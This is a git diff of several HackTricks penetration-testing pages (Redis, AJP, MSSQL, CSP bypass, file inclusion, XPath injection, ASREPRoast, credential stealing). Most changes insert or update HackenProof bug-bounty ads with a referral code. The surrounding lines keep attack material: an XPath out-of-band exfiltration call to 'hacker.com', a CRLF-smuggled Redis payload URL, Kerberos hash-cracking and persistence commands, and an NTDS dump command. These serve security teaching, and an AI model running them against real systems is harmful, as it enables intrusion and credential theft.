--- a/network-services-pentesting/6379-pentesting-redis.md
+++ b/network-services-pentesting/6379-pentesting-redis.md
@@ -12,6 +12,17 @@
 
 </details>
 
+
+<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FfinO3sjcfKcruYYBafKC%2Fimage.png?alt=media&#x26;token=7bba2ebb-a679-4357-a859-bff2d9c5136a" alt=""><figcaption></figcaption></figure>
+
+​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
+This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
+Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
+
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
+
+
 ## Basic Information
 
 Redis is an open source (BSD licensed), in-memory **data structure store**, used as a **database**, cache and message broker (from [here](https://redis.io/topics/introduction)). By default and commonly Redis uses a plain-text based protocol, but you have to keep in mind that it can also implement **ssl/tls**. Learn how to [run Redis with ssl/tls here](https://fossies.org/linux/redis/TLS.md).
@@ -137,6 +148,17 @@ HGET <KEY> <FIELD>
 
 **Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/)
 
+
+<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FfinO3sjcfKcruYYBafKC%2Fimage.png?alt=media&#x26;token=7bba2ebb-a679-4357-a859-bff2d9c5136a" alt=""><figcaption></figcaption></figure>
+
+​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
+This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
+Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
+
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
+
+
 ## Redis RCE
 
 ### Interactive Shell
@@ -307,6 +329,17 @@ git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agit
 
 _For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from) the exploitation worked with the `git` scheme and not with the `http` scheme._
 
+
+<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FfinO3sjcfKcruYYBafKC%2Fimage.png?alt=media&#x26;token=7bba2ebb-a679-4357-a859-bff2d9c5136a" alt=""><figcaption></figcaption></figure>
+
+​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
+This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
+Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
+
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
+
+
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
diff --git a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
index f184f4c2a..4414535bd 100644
--- a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
+++ b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
@@ -12,6 +12,17 @@
 
 </details>
 
+
+<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FfinO3sjcfKcruYYBafKC%2Fimage.png?alt=media&#x26;token=7bba2ebb-a679-4357-a859-bff2d9c5136a" alt=""><figcaption></figcaption></figure>
+
+​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
+This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
+Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
+
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
+
+
 ## Basic Information
 
 From: [https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/)
@@ -169,6 +180,17 @@ curl http://127.0.0.1:80
 
 * [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295)
 
+
+<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FfinO3sjcfKcruYYBafKC%2Fimage.png?alt=media&#x26;token=7bba2ebb-a679-4357-a859-bff2d9c5136a" alt=""><figcaption></figcaption></figure>
+
+​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
+This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
+Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
+
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
+
+
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
index 7183a75ce..101383688 100644
--- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
+++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
@@ -17,9 +17,9 @@
 Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## Basic Information
 
@@ -387,9 +387,9 @@ There are other methods to get command execution, such as adding [extended store
 Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## MSSQL Privilege Escalation
 
@@ -534,9 +534,9 @@ You probably will be able to **escalate to Administrator** following one of thes
 ​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## HackTricks Automatic Commands
 
diff --git a/network-services-pentesting/pentesting-ntp.md b/network-services-pentesting/pentesting-ntp.md
index c0a8a7dd8..2f3bbbc23 100644
--- a/network-services-pentesting/pentesting-ntp.md
+++ b/network-services-pentesting/pentesting-ntp.md
@@ -17,9 +17,9 @@
 ​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 ****This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## Basic Information
 
@@ -96,9 +96,9 @@ Entry_2:
 Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 <details>
 
diff --git a/pentesting-web/content-security-policy-csp-bypass/README.md b/pentesting-web/content-security-policy-csp-bypass/README.md
index a21dc01e5..2f97709b4 100644
--- a/pentesting-web/content-security-policy-csp-bypass/README.md
+++ b/pentesting-web/content-security-policy-csp-bypass/README.md
@@ -17,9 +17,9 @@
 Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## What is CSP
 
@@ -386,9 +386,9 @@ Trick from [**here**](https://ctftime.org/writeup/29310).
 ​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## Unsafe Technologies to Bypass CSP
 
@@ -533,9 +533,9 @@ Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y
 Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 <details>
 
diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md
index 772afe83c..dcc3bbbf3 100644
--- a/pentesting-web/csrf-cross-site-request-forgery.md
+++ b/pentesting-web/csrf-cross-site-request-forgery.md
@@ -17,9 +17,9 @@
 ​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## What is CSRF?
 
@@ -189,9 +189,9 @@ To set the domain name of the server in the URL that the Referrer is going to se
 ​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## **Exploit Examples**
 
@@ -594,9 +594,9 @@ with open(PASS_LIST, "r") as f:
 ​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 ****This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 <details>
 
diff --git a/pentesting-web/file-inclusion/README.md b/pentesting-web/file-inclusion/README.md
index e39362387..94c6d7191 100644
--- a/pentesting-web/file-inclusion/README.md
+++ b/pentesting-web/file-inclusion/README.md
@@ -17,9 +17,9 @@
 Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## File Inclusion
 
@@ -385,9 +385,9 @@ Be sure to URL-encode payloads before you send them.
 
 Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
-Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects. [**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects. [**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## LFI2RCE
 
@@ -553,9 +553,9 @@ If you found a **Local File Inclusion** and you **can exfiltrate the path** of t
 Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects. \
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 <details>
 
diff --git a/pentesting-web/reset-password.md b/pentesting-web/reset-password.md
index f59ca541e..4ac2bd3a9 100644
--- a/pentesting-web/reset-password.md
+++ b/pentesting-web/reset-password.md
@@ -17,9 +17,9 @@
 ​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 
 
@@ -328,9 +328,9 @@ The **reset tokens must have an expiration time**, after it the token shouldn't
 ​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 <details>
 
diff --git a/pentesting-web/xpath-injection.md b/pentesting-web/xpath-injection.md
index aaab68c93..65c0dbfaa 100644
--- a/pentesting-web/xpath-injection.md
+++ b/pentesting-web/xpath-injection.md
@@ -16,13 +16,22 @@
 
 </details>
 
+<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FfinO3sjcfKcruYYBafKC%2Fimage.png?alt=media&#x26;token=7bba2ebb-a679-4357-a859-bff2d9c5136a" alt=""><figcaption></figcaption></figure>
+
+​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
+This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
+Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
+
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
+
+
+# **Basic Syntax**
 
 XPath Injection is an attack technique used to exploit applications that construct XPath \(XML Path Language\) queries from user-supplied input to query or navigate XML documents.
 
 Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp](https://www.w3schools.com/xml/xpath_syntax.asp)
 
-# **Basic Syntax**
-
 ## Nodes
 
 | Expression | Description |
@@ -116,6 +125,17 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp
 | //\* | Selects all elements in the document |
 | //title\[@\*\] | Selects all title elements which have at least one attribute of any kind |
 
+
+<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FfinO3sjcfKcruYYBafKC%2Fimage.png?alt=media&#x26;token=7bba2ebb-a679-4357-a859-bff2d9c5136a" alt=""><figcaption></figcaption></figure>
+
+​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
+This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
+Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
+
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
+
+
 # Example
 
 ```markup
@@ -346,6 +366,15 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
 [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection)
 
 
+<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FfinO3sjcfKcruYYBafKC%2Fimage.png?alt=media&#x26;token=7bba2ebb-a679-4357-a859-bff2d9c5136a" alt=""><figcaption></figcaption></figure>
+
+​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
+This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
+Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
+
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
+
 
 <details>
 
diff --git a/windows-hardening/active-directory-methodology/asreproast.md b/windows-hardening/active-directory-methodology/asreproast.md
index ecd322e5a..80f765575 100644
--- a/windows-hardening/active-directory-methodology/asreproast.md
+++ b/windows-hardening/active-directory-methodology/asreproast.md
@@ -16,7 +16,18 @@
 
 </details>
 
-## ASREPRoast
+
+<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FfinO3sjcfKcruYYBafKC%2Fimage.png?alt=media&#x26;token=7bba2ebb-a679-4357-a859-bff2d9c5136a" alt=""><figcaption></figcaption></figure>
+
+​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
+This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
+Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
+
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
+
+
+# ASREPRoast
 
 The ASREPRoast attack looks for **users without Kerberos pre-authentication required attribute (**[_**DONT\_REQ\_PREAUTH**_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)_**)**_.
 
@@ -24,13 +35,13 @@ That means that anyone can send an AS\_REQ request to the DC on behalf of any of
 
 Furthermore, **no domain account is needed to perform this attack**, only connection to the DC. However, **with a domain account**, a LDAP query can be used to **retrieve users without Kerberos pre-authentication** in the domain. **Otherwise usernames have to be guessed**.
 
-#### Enumerating vulnerable users (need domain credentials)
+### Enumerating vulnerable users (need domain credentials)
 
 ```bash
 Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
 ```
 
-#### Request AS\_REP message
+### Request AS\_REP message
 
 {% code title="Using Linux" %}
 ```bash
@@ -52,14 +63,14 @@ Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github
 AS-REP Roasting with Rubeus will generate a 4768 with an encryption type of 0x17 and preauth type of 0.
 {% endhint %}
 
-### Cracking
+## Cracking
 
 ```
 john --wordlist=passwords_kerb.txt hashes.asreproast
 hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 
 ```
 
-### Persistence
+## Persistence
 
 Force **preauth** not required for a user where you have **GenericAll** permissions (or permissions to write properties):
 
@@ -67,8 +78,20 @@ Force **preauth** not required for a user where you have **GenericAll** permissi
 Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
 ```
 
+# References
 [**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
 
+
+<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FfinO3sjcfKcruYYBafKC%2Fimage.png?alt=media&#x26;token=7bba2ebb-a679-4357-a859-bff2d9c5136a" alt=""><figcaption></figcaption></figure>
+
+​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
+This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
+Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
+
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
+
+
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
diff --git a/windows-hardening/stealing-credentials/README.md b/windows-hardening/stealing-credentials/README.md
index d3edf7315..ad991f8dd 100644
--- a/windows-hardening/stealing-credentials/README.md
+++ b/windows-hardening/stealing-credentials/README.md
@@ -19,9 +19,9 @@
 Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## Credentials Mimikatz
 
@@ -175,9 +175,9 @@ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
 ​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 ****This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## Stealing SAM & SYSTEM
 
@@ -343,9 +343,9 @@ Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco
 ​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 ****This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 <details>